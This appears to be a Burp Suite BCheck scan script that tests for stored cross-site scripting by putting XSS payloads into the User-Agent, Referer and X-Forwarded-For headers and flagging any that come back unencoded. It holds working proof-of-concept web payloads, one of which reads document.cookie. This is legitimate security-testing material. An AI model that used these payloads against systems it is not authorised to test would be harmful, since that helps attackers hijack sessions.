metadata:
    language: v2-beta
    name: "XSS - Stored via HTTP Headers"
    description: "Tests for stored XSS via User-Agent, Referer, and other header injection points"
    author: "BCheck Arsenal"
    tags: "xss", "stored", "headers", "waf-bypass"

given request then
    send request called check:
        replacing header "User-Agent" with "<img/src=x onerror=alert(document.cookie)>"
        replacing header "Referer" with "<svg onload=alert(1)>"
        replacing header "X-Forwarded-For" with "<script>alert(1)</script>"

    if {check.response} matches "(<img/src=x|<svg onload|<script>alert)" then
        report issue:
            severity: high
            confidence: firm
            detail: "Stored XSS via HTTP header injection detected. Headers are reflected without sanitization."
            remediation: "Sanitize and encode all header values before rendering. Never trust HTTP headers as safe input."
    end if